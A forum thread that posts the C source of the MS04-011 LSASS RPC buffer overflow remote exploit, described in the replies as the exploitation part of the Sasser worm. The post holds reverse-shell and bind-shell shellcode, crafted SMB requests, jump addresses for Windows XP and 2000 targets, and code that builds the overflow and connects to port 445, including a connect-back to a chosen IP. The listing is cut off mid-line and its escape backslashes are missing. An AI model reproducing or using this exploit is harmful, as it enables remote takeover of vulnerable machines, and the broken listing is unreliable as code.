Jump to content
axxl2006

Sasser source code

Recommended Posts

#include <stdio.h>

#include <string.h>

#include <netdb.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <sys/types.h>

#include <arpa/inet.h>

// reverse shellcode

unsigned char reverseshell[] =

"xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA"

"xEBx05xE8xEBxFFxFFxFF"

"x70x62x99x99x99xC6xFDx38xA9x99x99x99x12xD9x95x12"

"xE9x85x34x12xF1x91x12x6ExF3x9DxC0x71x02x99x99x99"

"x7Bx60xF1xAAxABx99x99xF1xEExEAxABxC6xCDx66x8Fx12"

"x71xF3x9DxC0x71x1Bx99x99x99x7Bx60x18x75x09x98x99"

"x99xCDxF1x98x98x99x99x66xCFx89xC9xC9xC9xC9xD9xC9"

"xD9xC9x66xCFx8Dx12x41xF1xE6x99x99x98xF1x9Bx99x9D"

"x4Bx12x55xF3x89xC8xCAx66xCFx81x1Cx59xECxD3xF1xFA"

"xF4xFDx99x10xFFxA9x1Ax75xCDx14xA5xBDxF3x8CxC0x32"

"x7Bx64x5FxDDxBDx89xDDx67xDDxBDxA4x10xC5xBDxD1x10"

"xC5xBDxD5x10xC5xBDxC9x14xDDxBDx89xCDxC9xC8xC8xC8"

"xF3x98xC8xC8x66xEFxA9xC8x66xCFx9Dx12x55xF3x66x66"

"xA8x66xCFx91xCAx66xCFx85x66xCFx95xC8xCFx12xDCxA5"

"x12xCDxB1xE1x9Ax4CxCBx12xEBxB9x9Ax6CxAAx50xD0xD8"

"x34x9Ax5CxAAx42x96x27x89xA3x4FxEDx91x58x52x94x9A"

"x43xD9x72x68xA2x86xECx7ExC3x12xC3xBDx9Ax44xFFx12"

"x95xD2x12xC3x85x9Ax44x12x9Dx12x9Ax5Cx32xC7xC0x5A"

"x71x99x66x66x66x17xD7x97x75xEBx67x2Ax8Fx34x40x9C"

"x57x76x57x79xF9x52x74x65xA2x40x90x6Cx34x75x60x33"

"xF9x7ExE0x5FxE0";

// bind shellcode

unsigned char bindshell[] =

"xEBx10x5Ax4Ax33xC9x66xB9x7Dx01x80x34x0Ax99xE2xFA"

"xEBx05xE8xEBxFFxFFxFF"

"x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12"

"xE9x85x34x12xD9x91x12x41x12xEAxA5x12xEDx87xE1x9A"

"x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8x12xA6"

"x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D"

"xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A"

"x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58"

"x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0"

"x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41"

"xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B"

"x66xCEx75x12x41x5Ex9Ex9Bx99x9Dx4BxAAx59x10xDEx9D"

"xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA"

"x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0x10"

"x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF"

"xB5x98x98x14xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8"

"xC8x5ExDExA5xFAxF4xFDx99x14xDExA5xC9xC8x66xCEx79"

"xCBx66xCEx65xCAx66xCEx65xC9x66xCEx7DxAAx59x35x1C"

"x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59"

"x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD"

"xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC"

"xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5"

"xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6"

"xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8x99xFBxF0"

"xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED"

"x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99";

char req1[] =

"x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC8"

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"

"x00x00x00x00x00x62x00x02x50x43x20x4Ex45x54x57x4F"

"x52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02"

"x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6F"

"x77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70"

"x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30"

"x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54"

"x20x4Cx4Dx20x30x2Ex31x32x00";

char req2[] =

"x00x00x00xA4xFFx53x4Dx42x73x00x00x00x00x18x07xC8"

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"

"x00x00x10x00x0CxFFx00xA4x00x04x11x0Ax00x00x00x00"

"x00x00x00x20x00x00x00x00x00xD4x00x00x80x69x00x4E"

"x54x4Cx4Dx53x53x50x00x01x00x00x00x97x82x08xE0x00"

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"

"x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00"

"x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00"

"x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00"

"x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00"

"x2Ex00x30x00x00x00x00x00";

char req3[] =

"x00x00x00xDAxFFx53x4Dx42x73x00x00x00x00x18x07xC8"

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"

"x00x08x20x00x0CxFFx00xDAx00x04x11x0Ax00x00x00x00"

"x00x00x00x57x00x00x00x00x00xD4x00x00x80x9Fx00x4E"

"x54x4Cx4Dx53x53x50x00x03x00x00x00x01x00x01x00x46"

"x00x00x00x00x00x00x00x47x00x00x00x00x00x00x00x40"

"x00x00x00x00x00x00x00x40x00x00x00x06x00x06x00x40"

"x00x00x00x10x00x10x00x47x00x00x00x15x8Ax88xE0x48"

"x00x4Fx00x44x00x00x81x19x6Ax7AxF2xE4x49x1Cx28xAF"

"x30x25x74x10x67x53x57x00x69x00x6Ex00x64x00x6Fx00"

"x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00"

"x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00"

"x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00"

"x30x00x20x00x35x00x2Ex00x30x00x00x00x00x00";

char req4[] =

"x00x00x00x5CxFFx53x4Dx42x75x00x00x00x00x18x07xC8"

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"

"x00x08x30x00x04xFFx00x5Cx00x08x00x01x00x31x00x00"

"x5Cx00x5Cx00x31x00x39x00x32x00x2Ex00x31x00x36x00"

"x38x00x2Ex00x31x00x2Ex00x32x00x31x00x30x00x5Cx00"

"x49x00x50x00x43x00x24"

"x00x00x00x3Fx3Fx3Fx3Fx3Fx00";

char req5[] =

"x00x00x00x64xFFx53x4Dx42xA2x00x00x00x00x18x07xC8"

"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"

"x00x08x40x00x18xFFx00xDExDEx00x0Ex00x16x00x00x00"

"x00x00x00x00x9Fx01x02x00x00x00x00x00x00x00x00x00"

"x00x00x00x00x03x00x00x00x01x00x00x00x40x00x00x00"

"x02x00x00x00x03x11x00x00x5Cx00x6Cx00x73x00x61x00"

"x72x00x70x00x63x00x00x00";

char req6[] =

"x00x00x00x9CxFFx53x4Dx42x25x00x00x00x00x18x07xC8"

"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"

"x00x08x50x00x10x00x00x48x00x00x00x00x04x00x00x00"

"x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02"

"x00x26x00x00x40x59x00x10x5Cx00x50x00x49x00x50x00"

"x45x00x5Cx00x00x00x00x00x05x00x0Bx03x10x00x00x00"

"x48x00x00x00x01x00x00x00xB8x10xB8x10x00x00x00x00"

"x01x00x00x00x00x00x01x00x6Ax28x19x39x0CxB1xD0x11"

"x9BxA8x00xC0x4FxD9x2ExF5x00x00x00x00x04x5Dx88x8A"

"xEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00";

char req7[] =

"x00x00x0CxF4xFFx53x4Dx42x25x00x00x00x00x18x07xC8"

"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"

"x00x08x60x00x10x00x00xA0x0Cx00x00x00x04x00x00x00"

"x00x00x00x00x00x00x00x00x00x54x00xA0x0Cx54x00x02"

"x00x26x00x00x40xB1x0Cx10x5Cx00x50x00x49x00x50x00"

"x45x00x5Cx00x00x00x00x00x05x00x00x03x10x00x00x00"

"xA0x0Cx00x00x01x00x00x00x88x0Cx00x00x00x00x09x00"

"xECx03x00x00x00x00x00x00xECx03x00x00";

// room for shellcode here ...

char shit1[] =

"x95x14x40x00x03x00x00x00x7Cx70x40x00x01x00x00x00"

"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"

"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"

"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"

"x00x00x00x00x01x00x00x00x00x00x00x00x7Cx70x40x00"

"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"

"x7Cx70x40x00x01x00x00x00x00x00x00x00x01x00x00x00"

"x00x00x00x00x7Cx70x40x00x01x00x00x00x00x00x00x00"

"x01x00x00x00x00x00x00x00x78x85x13x00xABx5BxA6xE9";

char req8[] =

"x00x00x10xF8xFFx53x4Dx42x2Fx00x00x00x00x18x07xC8"

"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFE"

"x00x08x60x00x0ExFFx00xDExDEx00x40x00x00x00x00xFF"

"xFFxFFxFFx08x00xB8x10x00x00xB8x10x40x00x00x00x00"

"x00xB9x10xEEx05x00x00x01x10x00x00x00xB8x10x00x00"

"x01x00x00x00x0Cx20x00x00x00x00x09x00xADx0Dx00x00"

"x00x00x00x00xADx0Dx00x00";

// room for shellcode here ...

char req9[] =

"x00x00x0FxD8xFFx53x4Dx42x25x00x00x00x00x18x07xC8"

"x00x00x00x00x00x00x00x00x00x00x00x00x00x08x18x01"

"x00x08x70x00x10x00x00x84x0Fx00x00x00x04x00x00x00"

"x00x00x00x00x00x00x00x00x00x54x00x84x0Fx54x00x02"

"x00x26x00x00x40x95x0Fx00x5Cx00x50x00x49x00x50x00"

"x45x00x5Cx00x00x00x00x00x05x00x00x02x10x00x00x00"

"x84x0Fx00x00x01x00x00x00x6Cx0Fx00x00x00x00x09x00";

char shit3[] =

"x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00"

"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"

"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"

"x01x00x00x00"

"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"

"x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00"

"x01x00x00x00x00x00x00x00x9AxA8x40x00x01x00x00x00"

"x00x00x00x00x01x00x00x00x00x00x00x00x9AxA8x40x00"

"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00";

#define LEN 3500

#define BUFSIZE 2000

#define NOP 0x90

struct targets {

int num;

char name[50];

long jmpaddr;

} ttarget[]= {

{ 0, "WinXP Professional    [universal] lsass.exe ", 0x01004600 }, // jmp esp addr

{ 1, "Win2k Professional    [universal] netrap.dll", 0x7515123c }, // jmp ebx addr

{ 2, "Win2k Advanced Server [sP4]       netrap.dll", 0x751c123c }, // jmp ebx addr

};

void usage(char *prog)

{

int i;

printf("Usage:nn");

printf("%s <target> <victim IP> <bindport> [connectback IP] [options]nn", prog);

printf("Targets:n");

for (i=0; i<3; i++)

printf(" %d [0x%.8x]: %sn", ttarget[i].num, ttarget[i].jmpaddr, ttarget[i].name);

printf("nOptions:n");

printf(" -t: Detect remote OS:n");

printf(" Windows 5.1 - WinXPn");

printf(" Windows 5.0 - Win2knn");

exit(0);

}

int main(int argc, char *argv[])

{

int i;

int opt = 0;

char *target;

char hostipc[40];

char hostipc2[40*2];

unsigned short port;

unsigned long ip;

unsigned char *sc;

char buf[LEN+1];

char sendbuf[(LEN+1)*2];

char req4u[sizeof(req4)+20];

char screq[bUFSIZE+sizeof(req7)+1500+440];

char screq2k[4348+4060];

char screq2k2[4348+4060];

char recvbuf[1600];

char strasm[]="x66x81xECx1Cx07xFFxE4";

char strBuffer[bUFSIZE];

unsigned int targetnum = 0;

int len, sockfd;

short dport = 445;

struct hostent *he;

struct sockaddr_in their_addr;

char smblen;

char unclen;

printf("nMS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1n");

printf("--- Coded by .::[ houseofdabus ]::. ---nn");

if (argc < 4) {

usage(argv[0]);

}

target = argv[2];

sprintf((char *)hostipc,"%sipc$", target);

for (i=0; i<40; i++) {

hostipc2[i*2] = hostipc[i];

hostipc2[i*2+1] = 0;

}

memcpy(req4u, req4, sizeof(req4)-1);

memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);

memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9);

smblen = 52+(char)strlen(hostipc)*2;

memcpy(req4u+3, &smblen, 1);

unclen = 9 + (char)strlen(hostipc)*2;

memcpy(req4u+45, &unclen, 1);

if (argc > 4)

if (!memcmp(argv[4], "-t", 2)) opt = 1;

if ( (argc > 4) && !opt ) {

port = htons(atoi(argv[3]))^(unsigned short int)0x9999;

ip = inet_addr(argv[4])^(unsigned long int)0x99999999;

memcpy(&reverseshell[118], &port, 2);

memcpy(&reverseshell[111], &ip, 4);

sc = reverseshell;

} else {

port = htons(atoi(argv[3]))^(unsigned short int)0x9999;

memcpy(&bindshell[176], &port, 2);

sc = bindshell;

}

if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) {

memset(buf, NOP, LEN);

//memcpy(&buf[2020], "x3cx12x15x75", 4);

memcpy(&buf[2020], &ttarget[atoi(argv[1])].jmpaddr, 4);

memcpy(&buf[2036], sc, strlen(sc));

memcpy(&buf[2840], "xebx06xebx06", 4);

memcpy(&buf[2844], &ttarget[atoi(argv[1])].jmpaddr, 4); // jmp ebx addr

//memcpy(&buf[2844], "x3cx12x15x75", 4); // jmp ebx addr

memcpy(&buf[2856], sc, strlen(sc));

for (i=0; i<LEN; i++) {

sendbuf[i*2] = buf[i];

sendbuf[i*2+1] = 0;

}

sendbuf[LEN*2]=0;

sendbuf[LEN*2+1]=0;

memset(screq2k, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);

memset(screq2k2, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);

} else {

memset(strBuffer, NOP, BUFSIZE);

memcpy(strBuffer+160, sc, strlen(sc));

memcpy(strBuffer+1980, strasm, strlen(strasm));

*(long *)&strBuffer[1964]=ttarget[atoi(argv[1])].jmpaddr;

}

memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500);

if ((he=gethostbyname(argv[2])) == NULL) { // get the host info

perror("[-] gethostbyname ");

exit(1);

}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

perror("socket");

exit(1);

}

their_addr.sin_family = AF_INET;

their_addr.sin_port = htons(dport);

their_addr.sin_addr = *((struct in_addr *)he->h_addr);

memset(&(their_addr.sin_zero), '

Link to comment
Share on other sites

sau doar a facut rost de un astfel de worm , i-a luat codul sursa si ni l-a dat copy-paste , pentr a-l putea modifca dupa propiul plac , si apoi , complicam , si sa generam executabilul ?

Daca nu e asa cred ca ar fi trebuit ca titlul sau macar descrierea ostului sa curpinda si o mica explicatie , ce este si ce face ?! :o

Link to comment
Share on other sites

este doar o parte din codul sursa a worm-ului Sasser. Dupa cum va puteti da seama este doar partea prin care exploateaza vulnerabilitatea lsass. lipsesc codurile sursa pt serverul ftp, instalarea lui si cheile din registry, copierea lui pe pc-ul victimei, generarea unui ip random si exploatarea lui...si altele, depinde de versiune.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...